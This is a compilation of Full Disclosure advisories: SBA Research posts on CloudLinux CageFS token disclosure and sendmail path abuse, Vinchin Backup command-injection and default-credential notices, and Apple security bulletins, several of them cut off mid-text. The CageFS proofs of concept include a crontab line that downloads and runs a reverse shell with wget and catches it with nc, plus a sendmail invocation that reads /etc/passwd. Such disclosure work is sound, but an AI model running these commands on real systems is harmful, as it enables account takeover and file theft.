[FD] [SBA-ADV-20200707-01] CVE-2020-36771: CloudLinux CageFS 7.1.1-1 or below Token Disclosure

[SBA - Advisory via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: 
https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a
command line argument. In some configurations this allows local users to
view the authentication token via the process list and gain code execution
as another user.

* **Identifier**: SBA-ADV-20200707-01
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive 
Information
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor**: CloudLinux Inc.
* **Affected Versions** : <= 7.1.1-1
* **Fixed in Version**  : 7.1.2-2
* **CVE ID**: CVE-2020-36771
* **CVSS Vector**   : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score**   : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source: 

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem
feature is disabled, a local user can obtain the CageFS authentication
token of other users by exploiting the vulnerability documented in this
advisory. In most configurations this allows attackers to gain code
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment from
a user restricted within the CageFS envinronment.

For this purpose a CageFS daemon runs outside of the CageFS environment,
it is accessible via a UNIX socket from within the CageFS environment.
The UNIX socket is handled by `proxyexec`. To make the whole process of
calling a tool outside of the CageFS transparent to the user, wrapper
scripts are placed within CageFS, which in turn call `proxyexec` for
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which
prevents other users from seeing the CageFS token within the process
list. However, if the `lve_namespaces` service is disabled, e.g. the
systemd unit is masked out, or the virtualized proc filesystem is
explicitly disabled, other users can see the CageFS token within the
process list. They can use the CageFS token of other users to talk to
the CageFS daemon via `proxyexec` and the CageFS daemon executes the
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume, the `lve_namespaces` service is disabled and we are user
`ftp2406151`:

```sh
$ id
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)
```

We list the process list and find another user executing `ping example.org`:

```sh
$ ps aux | grep proxyexec
 2094 root  0:00 /usr/sbin/proxyexec -q -d -s 
/var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1180646 934   0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 
EjlVbSK63ye6dtHs / PING 1180642 example.org
1180647 root  0:00 /usr/sbin/proxyexec -q -d -s 
/var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1181229 ftp24061  0:00 grep proxyexec
```

We now can execute commands as user `ftp1488781` and, for example, view
the crontab:

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
no crontab for ftp1488781
```

Now we setup a new crontab entry, which downloads a reverse shell and
executes it every minute:

```sh
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x 
rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 
EjlVbSK63ye6dtHs / CRONTAB_SAVE 0
```

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell 
&& nohup ./rshell &
```

Our shell connects back to us and we can execute arbitrary commands as
the other user:

```sh
$ nc -l -p 1234
id
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)
```

## Recommended Countermeasures ##

We recommend to avoid passing sensitive information as a command line
argument. Instead, `proxyexec` should directly read the CageFS token
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version

[FD] [SBA-ADV-20200707-02] CVE-2020-36772: CloudLinux CageFS 7.0.8-2 or below Insufficiently Restricted Proxy Command

[SBA - Advisory via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

# CloudLinux CageFS Insufficiently Restricted Proxy Command #

Link: 
https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths
supplied to the `sendmail` proxy command. This allows local users to read
and write arbitrary files of certain file formats outside the CageFS
environment.

* **Identifier**: SBA-ADV-20200707-02
* **Type of Vulnerability** : External Control of File Name or Path
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor**: CloudLinux Inc.
* **Affected Versions** : <= 7.0.8-2
* **Fixed in Version**  : 7.1.1-1
* **CVE ID**: CVE-2020-36772
* **CVSS Vector**   : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
* **CVSS Base Score**   : 6.6 (Medium)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source: 

## Impact ##

A CageFS-restricted local user can read and write arbitrary files of certain
file formats outside the CageFS environment by exploiting the vulnerability
documented in this advisory.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment from
a user restricted within the CageFS environment.

CageFS allows in its default configuration to execute `sendmail` as a proxy
command outside the CageFS environment. This default configuration is
designed to allow local programs sending emails by invoking `sendmail`.
Due to the insufficient validation of sendmail's arguments an attacker can
invoke other sendmail functionality as well. While CageFS applies some
restrictions to the allowed arguments it does not restrict or validate the
`-bi` and `-oA` arguments.

Therefore, an attacker can have `sendmail` access arbitrary files which will
be interpreted as alias database files by enabling the `newalias` mode of
`sendmail` with `-bi` and specifying a file located outside the CageFS
environment with `-oA`.

On systems using the Postfix to Sendmail compatibility interface, a great
number of different alias database types can be used to craft exploits.
The compatibility interface internally calls `postalias` and besides the
`-oA` argument already being dangerous by itself, it also suffers from an
argument injection issue, which allows injection of additional Postfix
specific arguments for `postalias`. However, this is not a security issue
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a
security policy on command-line arguments. Instead, it relies on the
UNIX/Linux system to enforce access policies based on the effective user and
group IDs of the process. If a security policy should be enforced, the
calling process must sanitize the command-line arguments before they are
given to `sendmail`. This includes but is not limited to sanity checks on
pathnames, and if applicable sanity checks on file contents in a way that
is not vulnerable to time-of-check to time-of-use race attacks, and
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially
follow the structure `key  value` via the lookup table type
`texthash`:

```sh
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value 
-- ignoring this line
[...]
postalias: warning: /etc/passwd, line 211: expected format: key whitespace 
value -- ignoring this line
sssd:x:496:493:User:for sssd:/:/sbin/nologin
dbus:x:81:81:System:message bus:/:/sbin/nologin
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin
tss:x:59:59:Account:used by the trousers package to sandbox the tcsd 
daemon:/dev/null:/sbin/nologin
systemd-resolve:x:193:193:systemd:  Resolver:/:/sbin/nologin
rngd:x:494:491:Random:  Number Generator Daemon:/var/lib/rngd:/sbin/nologin
sshd:x:74:74:Privilege-separated:   SSH:/var/empty/sshd:/sbin/nologin
systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin
nobody:x:65534:65534:Kernel:Overflow User:/:/sbin/nologin
ftp:x:14:50:FTP:User:/var/ftp:/sbin/nologin
unbound:x:498:496:Unbound:  DNS resolver:/etc/unbound:/sbin/nologin
nrpe:x:492:486:NRPE:user for the NRPE service:/var/run/nrpe:/sbin/nologin
```

The attacker can also use other lookup table types which might disclose
sensitive infor

[FD] [Full Disclosure] CVE-2024-22900: Unpatched Command Injection in Vinchin Backup and Recovery Versions 7.2 and Earlier

[Balgogan via Fulldisclosure]

CVE ID: CVE-2024-22900

Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 
7.2 and Earlier

Description:
A critical security vulnerability, identified as CVE-2024-22900, has been 
discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and 
earlier. The vulnerability is present in the `setNetworkCardInfo` function, 
which is intended to update network card information.

Details:
1. The function collects the `NAME` parameter from the user request and assigns 
it to a variable `$name`.
2. The `NAME` parameter value is then used to construct a file path in the 
`setNetworkCardInfo` function, leading to potential command injection.
3. The vulnerability arises from the use of user-supplied input in system 
commands without proper validation and sanitization.

Impact:
This vulnerability allows an attacker to inject arbitrary commands via the 
`NAME` parameter, potentially leading to unauthorized access or control over 
the affected system.

Current Status:
As of the current date, there is no known patch available for this 
vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier 
are at risk.

Recommendation:
It is strongly recommended that users of the affected software versions remain 
vigilant and monitor Vinchin's updates for a security patch. Upon release of a 
patch, users should prioritize updating their systems to mitigate this security 
risk.

Signed,Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [Full Disclosure] CVE-2024-22899: Unpatched Command Injection in Vinchin Backup and Recovery Versions 7.2 and Earlier

[Valentin Lobstein via Fulldisclosure]

CVE ID: CVE-2024-22899

Title: Command Injection Vulnerability in Vinchin Backup and Recovery's 
syncNtpTime Function in Versions 7.2 and Earlier

Description:
A critical security vulnerability, identified as CVE-2024-22899, has been 
discovered in the `syncNtpTime` function of Vinchin Backup and Recovery 
software. This issue affects versions 7.2 and earlier. The function, part of 
the `SystemHandler.class.php` file, is designed for synchronizing system time 
with NTP servers but is prone to a command injection vulnerability due to 
improper handling of user input.

Function Analysis:
- The function is responsible for handling the `ntphost` parameter, which is 
expected to contain the address of the NTP server.
- The vulnerability stems from the direct concatenation of this parameter into 
a system command line, without adequate validation or sanitization.
- This design flaw allows an attacker to inject arbitrary commands into the 
`ntphost` parameter, which are then executed by the system.

Current Status:
As of now, there is no patch available for this vulnerability in versions 7.2 
and earlier of Vinchin Backup and Recovery. Users of these versions are at risk 
of exploitation.

Recommendation:
It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier 
to remain alert and monitor for updates from Vinchin. Once a patch becomes 
available, it should be applied immediately to mitigate the risk posed by this 
vulnerability.

Conclusion:
The discovery of CVE-2024-22899 underscores the importance of rigorous input 
validation and sanitization in software development. This vulnerability poses a 
severe security risk, potentially leading to unauthorized system access or 
control.

Signed,Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [Full Disclosure] CVE-2024-22901: Default MYSQL Credentials in Vinchin Backup & Recovery v7.2 and Earlier

[Valentin Lobstein via Fulldisclosure]

CVE ID: CVE-2024-22901

Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2

Description:
A critical security issue, identified as CVE-2024-22901, has been discovered in 
Vinchin Backup & Recovery version 7.2. The software has been found to use 
default MYSQL credentials, which could lead to significant security risks.

Additional Information:
Vinchin has not addressed previous disclosures, including CVE-2022-35866, and 
has not patched the reported vulnerabilities. The presence of these unresolved 
issues, now compounded by the newly discovered vulnerability of default MYSQL 
credentials, opens up potential avenues for easy unauthenticated Remote Code 
Execution (RCE). This lack of response is alarming for a product that is 
certified in cybersecurity and poses a considerable risk to its users.

Vulnerability Type:
Incorrect Access Control

Vendor of Product:
Vinchin

Affected Product Code Base:
Vinchin Backup & Recovery - Version 7.2

Affected Component:
The MySQL database used by Vinchin Backup & Recovery

Attack Type:
Remote

Impact - Escalation of Privileges:
True

Attack Vectors:
The vulnerability can be exploited via local or remote access, utilizing the 
unpatched default MySQL credentials.

Discoverer:
Valentin Lobstein

Reference:
http://vinchin.com

Conclusion:
The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin 
Backup & Recovery's security posture. Users are advised to be cautious and to 
monitor for any updates or patches from Vinchin, which should be applied 
immediately to mitigate this risk.

Signed,Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [Full Disclosure] CVE-2024-22902: Default Root Credentials in Vinchin Backup & Recovery v7.2 and Earlier

[Valentin Lobstein via Fulldisclosure]

CVE ID: CVE-2024-22902

Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2

Suggested Description:
Vinchin Backup & Recovery version 7.2 has been identified as being configured 
with default root credentials, posing a significant security vulnerability.

Additional Information:
There is no documentation or guidance from Vinchin on changing the root 
password for this version. The use of password authentication as root is 
possible, leading to potential unauthorized access.

Vulnerability Type:
Incorrect Access Control

Vendor of Product:
Vinchin

Affected Product Code Base:
Vinchin - Version 7.2

Attack Type:
Remote

Impact - Escalation of Privileges:
True

Attack Vectors:
This security flaw can be exploited through both local and remote access using 
the default root credentials provided in the software.

Discoverer:
Valentin Lobstein

References:
- http://vinchin.com

Conclusion:
The existence of default root credentials in Vinchin Backup & Recovery v7.2 
(CVE-2024-22902) is a serious security oversight. Users of this software 
version should be aware of the risks and stay alert for any updates or security 
patches from Vinchin. Immediate action should be taken to change these 
credentials to prevent unauthorized access.

Signed,Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [Full Disclosure] CVE-2024-22903: Unpatched Command Injection in Vinchin Backup & Recovery Versions 7.2 and Earlier

[Valentin Lobstein via Fulldisclosure]

CVE ID: CVE-2024-22903

Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin 
Backup & Recovery Versions 7.2 and Earlier

Description:
A significant security vulnerability, CVE-2024-22903, has been identified in 
the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of 
Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This 
function, designed to delete APK files, is prone to a command injection 
vulnerability due to improper handling of input parameters.

Function Analysis:
- The function extracts `md5` and `file_name` parameters from user input.
- It includes a check for an empty `file_name`, but lacks adequate validation 
or sanitization for the input used in constructing system commands.
- The command to delete the specified APK file, built using the `file_name` 
parameter, is executed via the `exec` function, leading to a security 
vulnerability.

Exploitation Risk:
Attackers can exploit this flaw by inserting malicious commands in the 
`file_name` parameter. When this parameter is processed by the vulnerable 
function, the injected commands are executed on the server, presenting a severe 
risk of unauthorized access or control.

Current Status:
As of the latest information, there is no known patch available for this 
vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.

Recommendation:
Users are urged to be vigilant and to monitor Vinchin for any security updates. 
Until a patch is released, implementing additional security controls and 
closely monitoring system activity is crucial for mitigating the risk posed by 
this vulnerability.

Signed,Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-1 Safari 17.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-1 Safari 17.3

Safari 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214056.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Safari
Available for: macOS Monterey and macOS Ventura
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

Safari 17.3 may be obtained from the Mac App Store.
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDK4ACgkQX+5d1TXa
IvpsdQ/+LRXsqQK9ZIXoBoXhj0w15DUKVrVfQr/jauI3pgxBZcuZeYiM0SyNnROH
SXppIL9KGUaOxDm+RqggN4rVB/PFPBTfZ7NB42odpnyxswVe7ozTir09BaYGnwoo
o+S2I8IN6Nn7ePV5wTXjmftUjNetk6J5iGQ4KboVPTPsNOuw+3r/nohjrYt2ERgq
YFVAsBK0gOQwY1chnNxOqFghWtZCkYKIinYCc89KcYVwZ6WpFaQlqk++E1p1vd1C
l4teK1uJv7thLkpneq9e3alb1qQCfX5XLpHX596uNrs0HXJYESQgwZgHmMqsssJa
LOCTahxE39Oevjy9q5z+UzaIBK2SAULgmaMdnrRLDV8641hDsjVuYyCzVs5jMNOa
+ty80EmEUiwcR/yuzbAmOgmdvuVuowdkGWR9pdhTWM9Co7PMdTRZLUiOsi4qUUPT
HxqJ42o53gNWzJhINTyufVRDd2VTcOH8X+C/uEbwMF/LHO4scNnI/0n1SrRsUCKg
msV7r3VheTGylX3KV/ivZiJq8agjheh/awRDQ1/1Lyd7yGb8tZSdP0iFrCgayB9d
RgrVR7yyXd/SCQsjI2hGRzTMoTQhARsx78dXtf2LFxONZZOFIaYnupzLxHeX58kp
lcN/OmgEb9w0t+/M9Lwn4kdvTZ/rbfF5+1BAI9VTuuAt9N+0fyk=
=jmbL
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3

iOS 17.3 and iPadOS 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214059.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for devices with Apple Neural Engine: iPhone XS and later,
iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st
generation and later, iPad Air 3rd generation and later, iPad 8th
generation and later, and iPad mini 5th generation and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

Mail Search
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Reset Services
Available for: iPhone XS and later
Impact: Stolen Device Protection may be unexpectedly disabled
Description: The issue was addressed with improved authentication.
CVE-2024-23219: Peter Watthey and Christian Scalese

Safari
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23203: an anonymous researcher
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation

[FD] APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5

iOS 16.7.5 and iPadOS 16.7.5 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214063.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

curl
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

ImageIO
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

Safari
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
WebKit Bugzilla: 265129
CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 Vulnerability
Research Institute

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/  iTunes and Software Update on the
device will automatically check Apple's update server on its weekly
schedule. When an update is detected, it is downloaded and the option
to be installed is presented to the user when the iOS device is
docked. We recommend applying the update immediately if possible.
Selecting Don't Install will present the option the next time you
connect your iOS device.  The automatic update process may take up to
a week depending on the day that iTunes or the device checks for
updates. You may manually obtain the update via the Check for Updates
button within iTunes, or the Software Update on your device.  To
check that the iPhone, iPod touch, or iPad has been updated:  *
Navigate to Settings * Select General * Select About. The version
after applying this update will be "iOS 16.7.5 and iPadOS 16.7.5".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/securit

[FD] APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1

[Apple Product Security via Fulldisclosure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1

iOS 15.8.1 and iPadOS 15.8.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214062.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE
(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch
(7th generation)
Impact: Processing web content may disclose sensitive information. Apple
is aware of a report that this issue may have been exploited against
versions of iOS before iOS 16.7.1.
Description: An out-of-bounds read was addressed with improved input
validation.
WebKit Bugzilla: 265041
CVE-2023-42916: Clément Lecigne of Google's Threat Analysis Group

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE
(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch
(7th generation)
Impact: Processing web content may lead to arbitrary code execution.
Apple is aware of a report that this issue may have been exploited
against versions of iOS before iOS 16.7.1.
Description: A memory corruption vulnerability was addressed with
improved locking.
WebKit Bugzilla: 265067
CVE-2023-42917: Clément Lecigne of Google's Threat Analysis Group

This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/  iTunes and Software Update on the
device will automatically check Apple's update server on its weekly
schedule. When an update is detected, it is downloaded and the option
to be installed is presented to the user when the iOS device is
docked. We recommend applying the update immediately if possible.
Selecting Don't Install will present the option the next time you
connect your iOS device.  The automatic update process may take up to
a week depending on the day that iTunes or the device checks for
updates. You may manually obtain the update via the Check for Updates
button within iTunes, or the Software Update on your device.  To
check that the iPhone, iPod touch, or iPad has been updated:  *
Navigate to Settings * Select General * Select About. The version
after applying this update will be "iOS 15.8.1 and iPadOS 15.8.1".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDd8ACgkQX+5d1TXa
IvrnYQ//eEhI4dYnq+om+sw4N+fNEcTZWLtBe3GyWgzVtBuvWOwt0Z34BNfVD4jF
